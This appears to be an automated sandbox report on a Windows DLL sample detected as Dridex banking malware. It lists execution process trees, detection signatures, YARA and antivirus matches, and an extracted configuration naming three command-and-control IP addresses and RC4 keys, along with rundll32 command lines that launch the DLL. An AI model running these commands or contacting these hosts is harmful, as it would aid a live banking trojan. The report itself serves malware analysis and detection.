Play interactive tour

Edit tour

Windows Analysis Report SecuriteInfo.com.Drixed-FJXE53A16BEA791.13728.12131

Overview

General Information

Sample Name:	SecuriteInfo.com.Drixed-FJXE53A16BEA791.13728.12131 (renamed file extension from 12131 to dll)
Analysis ID:	510686
MD5:	e53a16bea7918b1f7d4c0e659febc766
SHA1:	10d4d3d7fac35f6492cda2fb04aebf46903481f0
SHA256:	212cae7b05ecbc938b3a1fda4753d119f69360165955937b836fdbc7a6d514eb
Tags:	dll
Infos:
Most interesting Screenshot:

Detection

Dridex

Score:	76
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Yara detected Dridex unpacked file

Multi AV Scanner detection for submitted file

Tries to delay execution (extensive OutputDebugStringW loop)

C2 URLs / IPs found in malware configuration

Machine Learning detection for sample

Uses 32bit PE files

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

AV process strings found (often used to terminate AV products)

Antivirus or Machine Learning detection for unpacked file

Sample file is different than original file name gathered from version info

One or more processes crash

Contains functionality to query locales information (e.g. system language)

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to call native functions

Launches processes in debugging mode, may be used to hinder debugging

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Creates a process in suspended mode (likely to inject code)

IP address seen in connection with other malware

Abnormal high CPU Usage

Classification

Process Tree

System is w10x64

loaddll32.exe (PID: 6476 cmdline: loaddll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Drixed-FJXE53A16BEA791.13728.dll' MD5: 72FCD8FB0ADC38ED9050569AD673650E)

cmd.exe (PID: 6500 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Drixed-FJXE53A16BEA791.13728.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)

rundll32.exe (PID: 6544 cmdline: rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Drixed-FJXE53A16BEA791.13728.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 6528 cmdline: rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Drixed-FJXE53A16BEA791.13728.dll,FFRgpmdlwwWde MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 7080 cmdline: rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Drixed-FJXE53A16BEA791.13728.dll',CheckTrust MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 7088 cmdline: rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Drixed-FJXE53A16BEA791.13728.dll',DllCanUnloadNow MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

WerFault.exe (PID: 5056 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7088 -s 664 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

WerFault.exe (PID: 5588 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7088 -s 664 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

rundll32.exe (PID: 7100 cmdline: rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Drixed-FJXE53A16BEA791.13728.dll',DllGetClassObject MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

WerFault.exe (PID: 1312 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7100 -s 664 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

WerFault.exe (PID: 5440 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7100 -s 664 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

rundll32.exe (PID: 7112 cmdline: rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Drixed-FJXE53A16BEA791.13728.dll',DownloadFile MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

WerFault.exe (PID: 1768 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7112 -s 664 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

WerFault.exe (PID: 5452 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7112 -s 664 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

rundll32.exe (PID: 7124 cmdline: rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Drixed-FJXE53A16BEA791.13728.dll',GetICifFileFromFile MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

WerFault.exe (PID: 1536 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7124 -s 664 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

WerFault.exe (PID: 5016 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7124 -s 664 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

cleanup

Malware Configuration

Threatname: Dridex

{"Version": 22201, "C2 list": ["149.202.179.100:443", "66.147.235.11:6891", "81.0.236.89:13786"], "RC4 keys": ["9fRysqcdPgZffBlroqJaZHyCvLvD6BUV", "ranVAwtYINZG8jFJSjh5rR8jx3HIZIvSCern79nVFUhfeb2NvJlOKPsGO1osGE0VchV9bFDjym"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
0000000D.00000000.732486689.000000006F021000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
0000000D.00000000.723436557.000000006F021000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
0000000C.00000002.756877122.000000006F021000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
0000000B.00000000.712349151.000000006F021000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
0000000D.00000002.765113573.000000006F021000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
00000009.00000002.874852641.000000006F021000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
00000002.00000000.475579943.000000006F021000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
0000000B.00000000.722717692.000000006F021000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
0000000A.00000000.697948285.000000006F021000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
0000000A.00000000.716630933.000000006F021000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
00000000.00000000.523799622.000000006F021000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
0000000A.00000002.758018244.000000006F021000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
0000000B.00000002.759412743.000000006F021000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
0000000C.00000000.715578502.000000006F021000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
0000000C.00000000.709098090.000000006F021000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
00000003.00000002.873904073.000000006F021000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
Click to see the 11 entries

Unpacked PEs

Source	Rule	Description	Author
10.0.rundll32.exe.6f020000.5.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
13.0.rundll32.exe.6f020000.2.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
11.0.rundll32.exe.6f020000.5.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
10.2.rundll32.exe.6f020000.2.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
10.0.rundll32.exe.6f020000.2.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
2.0.rundll32.exe.6f020000.2.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
12.2.rundll32.exe.6f020000.2.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
13.2.rundll32.exe.6f020000.2.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
12.0.rundll32.exe.6f020000.5.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
3.2.rundll32.exe.6f020000.2.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
13.0.rundll32.exe.6f020000.5.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
11.0.rundll32.exe.6f020000.2.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
0.0.loaddll32.exe.6f020000.2.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
12.0.rundll32.exe.6f020000.2.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
11.2.rundll32.exe.6f020000.2.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
9.2.rundll32.exe.6f020000.2.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
Click to see the 11 entries

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 10.2.rundll32.exe.6f020000.2.unpack

Malware Configuration Extractor: Dridex {"Version": 22201, "C2 list": ["149.202.179.100:443", "66.147.235.11:6891", "81.0.236.89:13786"], "RC4 keys": ["9fRysqcdPgZffBlroqJaZHyCvLvD6BUV", "ranVAwtYINZG8jFJSjh5rR8jx3HIZIvSCern79nVFUhfeb2NvJlOKPsGO1osGE0VchV9bFDjym"]}

Multi AV Scanner detection for submitted file

Show sources

Source: SecuriteInfo.com.Drixed-FJXE53A16BEA791.13728.dll	Virustotal: Detection: 21%			Perma Link
Source: SecuriteInfo.com.Drixed-FJXE53A16BEA791.13728.dll	ReversingLabs: Detection: 31%

Machine Learning detection for sample

Show sources

Source: SecuriteInfo.com.Drixed-FJXE53A16BEA791.13728.dll

Joe Sandbox ML: detected

Source: 3.2.rundll32.exe.2ba4756.1.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 12.0.rundll32.exe.2bd0000.3.unpack	Avira: Label: TR/ATRAPS.Gen2
Source: 10.2.rundll32.exe.44c4756.1.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 11.0.rundll32.exe.2bf4756.4.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 2.0.rundll32.exe.3fe4756.4.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.0.rundll32.exe.2a00000.0.unpack	Avira: Label: TR/ATRAPS.Gen2
Source: 3.2.rundll32.exe.27b0000.0.unpack	Avira: Label: TR/ATRAPS.Gen2
Source: 12.2.rundll32.exe.2bd0000.0.unpack	Avira: Label: TR/ATRAPS.Gen2
Source: 13.0.rundll32.exe.2580000.3.unpack	Avira: Label: TR/ATRAPS.Gen2
Source: 12.0.rundll32.exe.2dd4756.4.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 2.0.rundll32.exe.3fe4756.1.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 13.0.rundll32.exe.2580000.0.unpack	Avira: Label: TR/ATRAPS.Gen2
Source: 11.2.rundll32.exe.2bf4756.1.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 11.0.rundll32.exe.2bf4756.1.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.0.rundll32.exe.44c4756.4.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 13.0.rundll32.exe.4034756.4.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 11.0.rundll32.exe.28e0000.3.unpack	Avira: Label: TR/ATRAPS.Gen2
Source: 0.0.loaddll32.exe.5b0000.3.unpack	Avira: Label: TR/ATRAPS.Gen2
Source: 12.2.rundll32.exe.2dd4756.1.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 0.0.loaddll32.exe.5b0000.0.unpack	Avira: Label: TR/ATRAPS.Gen2
Source: 13.0.rundll32.exe.4034756.1.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 12.0.rundll32.exe.2dd4756.1.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 2.0.rundll32.exe.2580000.0.unpack	Avira: Label: TR/ATRAPS.Gen2
Source: 0.0.loaddll32.exe.e04756.4.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 11.0.rundll32.exe.28e0000.0.unpack	Avira: Label: TR/ATRAPS.Gen2
Source: 10.2.rundll32.exe.2a00000.0.unpack	Avira: Label: TR/ATRAPS.Gen2
Source: 11.2.rundll32.exe.28e0000.0.unpack	Avira: Label: TR/ATRAPS.Gen2
Source: 13.2.rundll32.exe.4034756.1.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.0.rundll32.exe.44c4756.1.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 0.0.loaddll32.exe.e04756.1.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 2.0.rundll32.exe.2580000.3.unpack	Avira: Label: TR/ATRAPS.Gen2
Source: 10.0.rundll32.exe.2a00000.3.unpack	Avira: Label: TR/ATRAPS.Gen2
Source: 9.2.rundll32.exe.2894756.1.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 12.0.rundll32.exe.2bd0000.0.unpack	Avira: Label: TR/ATRAPS.Gen2
Source: 9.2.rundll32.exe.2790000.0.unpack	Avira: Label: TR/ATRAPS.Gen2
Source: 13.2.rundll32.exe.2580000.0.unpack	Avira: Label: TR/ATRAPS.Gen2

Source: SecuriteInfo.com.Drixed-FJXE53A16BEA791.13728.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: SecuriteInfo.com.Drixed-FJXE53A16BEA791.13728.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: rpidebbfll.pdb source: SecuriteInfo.com.Drixed-FJXE53A16BEA791.13728.dll
Source:	Binary string: wntdll.pdbUGP source: rundll32.exe, 00000003.00000003.452788302.000000004B280000.00000004.00000001.sdmp, rundll32.exe, 00000009.00000003.690183508.000000004B280000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdb source: rundll32.exe, 00000003.00000003.452788302.000000004B280000.00000004.00000001.sdmp, rundll32.exe, 00000009.00000003.690183508.000000004B280000.00000004.00000001.sdmp

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor	IPs: 149.202.179.100:443
Source: Malware configuration extractor	IPs: 66.147.235.11:6891
Source: Malware configuration extractor	IPs: 81.0.236.89:13786

Source: Joe Sandbox View	ASN Name: HOSTROCKETUS HOSTROCKETUS
Source: Joe Sandbox View	ASN Name: OVHFR OVHFR

Source: Joe Sandbox View	IP Address: 66.147.235.11 66.147.235.11
Source: Joe Sandbox View	IP Address: 149.202.179.100 149.202.179.100
Source: Joe Sandbox View	IP Address: 81.0.236.89 81.0.236.89

Source: Amcache.hve.21.dr	String found in binary or memory: http://upx.sf.net
Source: loaddll32.exe, 00000000.00000000.523818743.000000006F03F000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000000.475656275.000000006F03F000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.873978106.000000006F03F000.00000002.00020000.sdmp, rundll32.exe, 00000009.00000002.874891443.000000006F03F000.00000002.00020000.sdmp, rundll32.exe, 0000000A.00000002.758338318.000000006F03F000.00000002.00020000.sdmp, rundll32.exe, 0000000B.00000000.723066869.000000006F03F000.00000002.00020000.sdmp, rundll32.exe, 0000000C.00000000.712126341.000000006F03F000.00000002.00020000.sdmp, rundll32.exe, 0000000D.00000002.765202970.000000006F03F000.00000002.00020000.sdmp	String found in binary or memory: http://www.vomfass.deDVarFileInfo$

E-Banking Fraud:

Yara detected Dridex unpacked file

Show sources

Source: Yara match	File source: 10.0.rundll32.exe.6f020000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.0.rundll32.exe.6f020000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.0.rundll32.exe.6f020000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.6f020000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.rundll32.exe.6f020000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.rundll32.exe.6f020000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.6f020000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.6f020000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.0.rundll32.exe.6f020000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.6f020000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.0.rundll32.exe.6f020000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.0.rundll32.exe.6f020000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.loaddll32.exe.6f020000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.0.rundll32.exe.6f020000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.6f020000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.6f020000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000000.732486689.000000006F021000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000000.723436557.000000006F021000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.756877122.000000006F021000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000000.712349151.000000006F021000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.765113573.000000006F021000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.874852641.000000006F021000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.475579943.000000006F021000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000000.722717692.000000006F021000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000000.697948285.000000006F021000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000000.716630933.000000006F021000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.523799622.000000006F021000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.758018244.000000006F021000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.759412743.000000006F021000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000000.715578502.000000006F021000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000000.709098090.000000006F021000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.873904073.000000006F021000.00000020.00020000.sdmp, type: MEMORY

Source: SecuriteInfo.com.Drixed-FJXE53A16BEA791.13728.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: SecuriteInfo.com.Drixed-FJXE53A16BEA791.13728.dll

Binary or memory string: OriginalFilenameddlb.dll vs SecuriteInfo.com.Drixed-FJXE53A16BEA791.13728.dll

Source: C:\Windows\SysWOW64\rundll32.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7088 -s 664

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6F030754	3_2_6F030754
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6F039348	3_2_6F039348
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6F02A52C	3_2_6F02A52C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6F031D58	3_2_6F031D58
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6F031460	3_2_6F031460
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6F02846C	3_2_6F02846C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6F021494	3_2_6F021494

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6F03223C NtDelayExecution,	3_2_6F03223C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6F032840 NtAllocateVirtualMemory,	3_2_6F032840
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6F02BB88 NtClose,	3_2_6F02BB88

Source: C:\Windows\SysWOW64\rundll32.exe

Process Stats: CPU usage > 98%

Source: SecuriteInfo.com.Drixed-FJXE53A16BEA791.13728.dll	Virustotal: Detection: 21%
Source: SecuriteInfo.com.Drixed-FJXE53A16BEA791.13728.dll	ReversingLabs: Detection: 31%

Source: SecuriteInfo.com.Drixed-FJXE53A16BEA791.13728.dll

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Drixed-FJXE53A16BEA791.13728.dll,FFRgpmdlwwWde

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Drixed-FJXE53A16BEA791.13728.dll'
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Drixed-FJXE53A16BEA791.13728.dll',#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Drixed-FJXE53A16BEA791.13728.dll,FFRgpmdlwwWde
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Drixed-FJXE53A16BEA791.13728.dll',#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Drixed-FJXE53A16BEA791.13728.dll',CheckTrust
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Drixed-FJXE53A16BEA791.13728.dll',DllCanUnloadNow
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Drixed-FJXE53A16BEA791.13728.dll',DllGetClassObject
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Drixed-FJXE53A16BEA791.13728.dll',DownloadFile
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Drixed-FJXE53A16BEA791.13728.dll',GetICifFileFromFile
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7088 -s 664
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7100 -s 664
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7112 -s 664
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7112 -s 664
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7088 -s 664
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7100 -s 664
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7124 -s 664
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7124 -s 664
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Drixed-FJXE53A16BEA791.13728.dll',#1	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Drixed-FJXE53A16BEA791.13728.dll,FFRgpmdlwwWde	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Drixed-FJXE53A16BEA791.13728.dll',CheckTrust	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Drixed-FJXE53A16BEA791.13728.dll',DllCanUnloadNow	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Drixed-FJXE53A16BEA791.13728.dll',DllGetClassObject	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Drixed-FJXE53A16BEA791.13728.dll',DownloadFile	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Drixed-FJXE53A16BEA791.13728.dll',GetICifFileFromFile	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Drixed-FJXE53A16BEA791.13728.dll',#1	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7088 -s 664	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7100 -s 664	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7112 -s 664	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7124 -s 664	Jump to behavior

Source: SecuriteInfo.com.Drixed-FJXE53A16BEA791.13728.12131

Joe Sandbox Cloud Basic: Detection: clean Score: 0

Perma Link

Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7112
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7124
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7088
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7100

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\WER3916.tmp

Jump to behavior

Source: classification engine

Classification label: mal76.troj.evad.winDLL@33/18@0/4

Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: SecuriteInfo.com.Drixed-FJXE53A16BEA791.13728.dll

Static file information: File size 1093632 > 1048576

Source: SecuriteInfo.com.Drixed-FJXE53A16BEA791.13728.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source: SecuriteInfo.com.Drixed-FJXE53A16BEA791.13728.dll

